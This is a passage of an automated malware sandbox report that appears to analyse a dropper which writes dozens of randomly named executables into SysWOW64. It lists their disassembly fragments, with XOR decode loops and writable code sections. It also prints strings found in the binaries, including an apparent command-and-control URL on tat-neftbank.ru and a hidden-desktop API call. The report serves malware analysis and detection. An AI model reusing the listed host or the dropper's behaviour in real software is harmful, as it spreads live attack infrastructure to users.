                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then popad 9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then jmp 00401219h9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then pop edi9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then mov ebx, 00407EF8h9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then sub ecx, eax9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then xor edx, edx9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then push eax9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then div edi9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then xchg eax, ecx9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then add eax, edi9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then loop 00403B3Eh9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then mov eax, 0042A000h9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then mov ebx, 0042CD70h9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then sub ecx, eax9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then xor edx, edx9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then push eax9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then div edi9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then xchg eax, ecx9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then add eax, edi9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then loop 00403B9Eh9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then popad 9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then je 00403A1Ch9_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then xor dword ptr [eax], ecx9_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then inc eax9_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then jne 004039F2h9_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then mov eax, 0042A000h9_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then je 00403A52h9_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then xor dword ptr [eax], ecx9_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then add eax, 04h9_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then jne 00403A3Ah9_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then popad 9_2_004039CE
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]10_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then add ebx, 04h10_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then jl 00403A8Fh10_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then add eax, 0Ch10_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then popad 10_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then add eax, 00403AC5h10_2_0042E00C
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then mov ebx, dword ptr [eax]10_2_0042E00C
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then add eax, 0Ch10_2_0042E00C
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then pop edi10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then mov ebx, 00407EF8h10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then sub ecx, eax10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then xor edx, edx10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then push eax10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then div edi10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then xchg eax, ecx10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then add eax, edi10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then loop 00403B3Eh10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then mov eax, 0042A000h10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then mov ebx, 0042CD70h10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then sub ecx, eax10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then xor edx, edx10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then push eax10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then div edi10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then xchg eax, ecx10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then add eax, edi10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then loop 00403B9Eh10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then popad 10_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then je 00403A1Ch10_2_004039CE
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then xor dword ptr [eax], ecx10_2_004039CE
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then inc eax10_2_004039CE
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then jne 004039F2h10_2_004039CE
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then mov eax, 0042A000h10_2_004039CE
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then je 00403A52h10_2_004039CE
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then xor dword ptr [eax], ecx10_2_004039CE
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then add eax, 04h10_2_004039CE
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then jne 00403A3Ah10_2_004039CE
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 4x nop then popad 10_2_004039CE
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]11_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then add ebx, 04h11_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then jl 00403A8Fh11_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then add eax, 0Ch11_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then popad 11_2_00403A6B
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then call 0042E00Ch11_2_0042E000
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then pop eax11_2_0042E00C
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then mov edx, dword ptr [eax+08h]11_2_0042E00C
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then cmp dword ptr [eax], 00000000h11_2_0042E00C
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then popad 11_2_0042E00C
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then pop edi11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then mov ebx, 00407EF8h11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then sub ecx, eax11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then xor edx, edx11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then push eax11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then div edi11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then xchg eax, ecx11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then add eax, edi11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then loop 00403B3Eh11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then mov eax, 0042A000h11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then mov ebx, 0042CD70h11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then sub ecx, eax11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then xor edx, edx11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then push eax11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then div edi11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then xchg eax, ecx11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then add eax, edi11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then loop 00403B9Eh11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then popad 11_2_00403AC7
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then je 00403A1Ch11_2_004039CE
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then xor dword ptr [eax], ecx11_2_004039CE
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then inc eax11_2_004039CE
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then jne 004039F2h11_2_004039CE
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then mov eax, 0042A000h11_2_004039CE
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then je 00403A52h11_2_004039CE
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then xor dword ptr [eax], ecx11_2_004039CE
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then add eax, 04h11_2_004039CE
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then jne 00403A3Ah11_2_004039CE
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 4x nop then popad 11_2_004039CE
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]12_2_00403A6B
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then add ebx, 04h12_2_00403A6B
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then jl 00403A8Fh12_2_00403A6B
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then add eax, 0Ch12_2_00403A6B
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then popad 12_2_00403A6B
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then mov ecx, ebx12_2_0042E000
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then push eax12_2_0042E000
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then mov esi, 679D3F73h12_2_0042E000
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then push eax12_2_0042E000
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then div edi12_2_0042E000
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then add eax, edi12_2_0042E000
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then pop edi12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then mov ebx, 00407EF8h12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then sub ecx, eax12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then xor edx, edx12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then push eax12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then div edi12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then xchg eax, ecx12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then add eax, edi12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then loop 00403B3Eh12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then mov eax, 0042A000h12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then mov ebx, 0042CD70h12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then sub ecx, eax12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then xor edx, edx12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then push eax12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then div edi12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then xchg eax, ecx12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then add eax, edi12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then loop 00403B9Eh12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then popad 12_2_00403AC7
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then je 00403A1Ch12_2_004039CE
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then xor dword ptr [eax], ecx12_2_004039CE
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then inc eax12_2_004039CE
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then jne 004039F2h12_2_004039CE
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then mov eax, 0042A000h12_2_004039CE
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then je 00403A52h12_2_004039CE
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then xor dword ptr [eax], ecx12_2_004039CE
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 4x nop then add eax, 04h12_2_004039CE
                      Source: h879iieoae.exe, Fhedeo32.exe.36.dr, Odekfoij.exe.8.dr, Efgkjnfn.exe.33.dr, Bgibkegc.exe.21.dr, Feidnc32.exe.37.dr, Bgamkfnl.exe.17.dr, Cnjaioih.exe.26.dr, Oeanchcn.exe.5.dr, Dfcboo32.exe.30.dr, Ggmnlk32.exe.39.dr, Baagdk32.exe.22.dr, Bnnampcf.exe.19.dr, Eoappk32.exe.34.dr, Olijjb32.exe.4.dr, Oceoll32.exe.6.dr, Ajkolbad.exe.15.dr, Pqeoao32.exe.13.dr, Cfnpmb32.exe.23.dr, Dnhmjm32.exe.29.dr, Foaigifk.exe.38.drString found in binary or memory: http://oracle.com/contracts
                      Source: Fkogfkdj.exe.35.drString found in binary or memory: http://oracle.com/contracts.
                      Source: h879iieoae.exe, h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exeString found in binary or memory: http://tat-neftbank.ru/kkq.php
                      Source: h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exe, 0000000A.00000002.1986379697.000000000042A000.00000004.00000001.01000000.0000000D.sdmp, Ppllkpoo.exe, 0000000B.00000002.1988867655.000000000042A000.00000004.00000001.01000000.0000000E.sdmp, Plbmqa32.exe, 0000000C.00000002.1990903099.000000000042A000.00000004.00000001.01000000.0000000F.sdmp, Plgflqpn.exe, 0000000D.00000002.1993494029.000000000042A000.00000004.00000001.01000000.00000010.sdmp, Pqeoao32.exe, 0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmp, Qgcpihjl.exe, 0000000F.00000002.2000063573.000000000042A000.00000004.00000001.01000000.00000012.sdmp, Ajkolbad.exe, 00000010.00000002.2000741077.000000000042A000.00000004.00000001.01000000.00000013.sdmp, Bmlhnnne.exe, 00000011.00000002.2001790871.000000000042A000.00000004.00000001.01000000.00000014.sdmp, Bgamkfnl.exe, 00000012.00000002.2002333377.000000000042A000.00000004.00000001.01000000.00000015.sdmp, Bqjacldl.exe, 00000013.00000002.2003694218.000000000042A000.00000004.00000001.01000000.00000016.sdmp, Bnnampcf.exe, 00000014.00000002.2004277931.000000000042A000.00000004.00000001.01000000.00000017.sdmpString found in binary or memory: http://tat-neftbank.ru/kkq.phphttp://tat-neftbank.ru/wcmd.htmSoftware
                      Source: h879iieoae.exe, h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exeString found in binary or memory: http://tat-neftbank.ru/wcmd.htm
                      Source: h879iieoae.exe, Fhedeo32.exe.36.dr, Odekfoij.exe.8.dr, Efgkjnfn.exe.33.dr, Bgibkegc.exe.21.dr, Feidnc32.exe.37.dr, Bgamkfnl.exe.17.dr, Cnjaioih.exe.26.dr, Oeanchcn.exe.5.dr, Dfcboo32.exe.30.dr, Ggmnlk32.exe.39.dr, Baagdk32.exe.22.dr, Bnnampcf.exe.19.dr, Eoappk32.exe.34.dr, Olijjb32.exe.4.dr, Oceoll32.exe.6.dr, Ajkolbad.exe.15.dr, Pqeoao32.exe.13.dr, Cfnpmb32.exe.23.dr, Dnhmjm32.exe.29.dr, Foaigifk.exe.38.drString found in binary or memory: http://www.oracle.com/education/oln.
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_0040431F GetCurrentThreadId,GetThreadDesktop,CreateDesktopA,SetThreadDesktop,0_2_0040431F

                      System Summary

                      barindex
                      PE file has a writeable .text section
                      Source: h879iieoae.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Nejhbi32.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Ogjdllpi.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Opbieagi.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Oglabl32.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Olijjb32.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Oeanchcn.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Oceoll32.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Onkcje32.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Odekfoij.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Ojacofgb.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Ppllkpoo.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Plbmqa32.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Plgflqpn.exe.12.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Pqeoao32.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Qgcpihjl.exe.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Ajkolbad.exe.15.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Bmlhnnne.exe.16.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Bgamkfnl.exe.17.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Bqjacldl.exe.18.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Bnnampcf.exe.19.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Bnpnbp32.exe.20.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Bgibkegc.exe.21.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Baagdk32.exe.22.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Cfnpmb32.exe.23.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Ccapffke.exe.24.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Ceampi32.exe.25.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Cnjaioih.exe.26.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Camgpi32.exe.27.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Dmfdkj32.exe.28.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Dnhmjm32.exe.29.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
